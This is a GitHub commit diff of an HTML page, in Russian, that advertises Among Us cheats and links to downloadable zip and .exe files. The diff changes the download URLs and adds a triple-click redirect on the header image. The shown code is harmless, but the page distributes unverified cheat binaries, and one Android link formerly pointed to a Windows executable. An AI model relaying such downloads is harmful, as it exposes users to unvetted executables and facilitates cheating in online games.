Skip to content

Commit a696b54

Browse files
authored
Update Among_Us.html
1 parent d57cdd2 commit a696b54

File tree

1 file changed

+13
-4
lines changed

1 file changed

+13
-4
lines changed

Among_Us.html

+13-4
Original file line numberDiff line numberDiff line change
@@ -35,6 +35,7 @@
3535
width: 100%;
3636
height: 350px;
3737
background: url('cheat.jpg') center/contain no-repeat;
38+
cursor: pointer;
3839
}
3940
.button-group {
4041
display: flex;
@@ -73,13 +74,13 @@
7374
</style>
7475
</head>
7576
<body>
76-
<div class="header-image"></div>
77+
<div class="header-image" id="headerImage"></div>
7778
<h1>Самые лучшие читы на Among Us</h1>
7879
<div class="button-group">
79-
<a href="https://github.com/MAINER4IK/SickoMenu/releases/download/Release/SickoMenu.zip" download>
80+
<a href="https://github.com/MAINER4IK/SickoPolar/releases/download/Release/SickoMenu.zip" download>
8081
<button class="code-button">Скачать на Windows</button>
8182
</a>
82-
<a href="https://github.com/MAINER4IK/windofrar/releases/download/Release/windofrar.exe" download>
83+
<a href="https://github.com/MAINER4IK/SickoPolar/releases/download/Release/Polar.Pather.zip" download>
8384
<button class="download-button">Скачать на Android</button>
8485
</a>
8586
</div>
@@ -106,6 +107,14 @@ <h1>Самые лучшие читы на Among Us</h1>
106107
if (delCount === 0) window.location.href = 'index.html';
107108
}
108109
});
110+
111+
let clickCount = 0;
112+
document.getElementById('headerImage').addEventListener('click', () => {
113+
clickCount++;
114+
if (clickCount === 3) {
115+
window.location.href = 'index.html';
116+
}
117+
});
109118
</script>
110119
</body>
111-
</html>
120+
</html>

0 commit comments

Comments
 (0)